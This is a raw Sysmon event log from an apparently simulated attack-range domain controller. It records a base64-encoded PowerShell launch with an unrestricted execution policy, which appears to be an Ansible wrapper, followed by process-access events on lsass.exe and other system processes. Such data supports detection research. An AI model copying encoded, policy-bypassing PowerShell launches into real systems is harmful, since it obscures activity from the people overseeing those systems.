JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8583-5FCF-F6EB-060000000000}0x6ebf60HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8583-5FCF-B800-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x80000000000000003714Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.752{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8583-5FCF-B800-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003713Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.752{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8583-5FCF-B800-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003712Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.720{10ACEC4A-8583-5FCF-B800-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_40spqfl1.xfd.ps12020-12-08 13:54:11.720 10341000x80000000000000003711Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.705{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8583-5FCF-B800-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003710Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8583-5FCF-B600-000000009101}45204532C:\Windows\system32\conhost.exe{10ACEC4A-8583-5FCF-B800-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003709Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003708Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003707Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003706Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003705Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003704Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003703Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003702Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003701Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003700Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003699Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003698Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8583-5FCF-B800-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003697Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.674{10ACEC4A-8583-5FCF-B700-000000009101}10041184C:\Windows\system32\cmd.exe{10ACEC4A-8583-5FCF-B800-000000009101}3328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 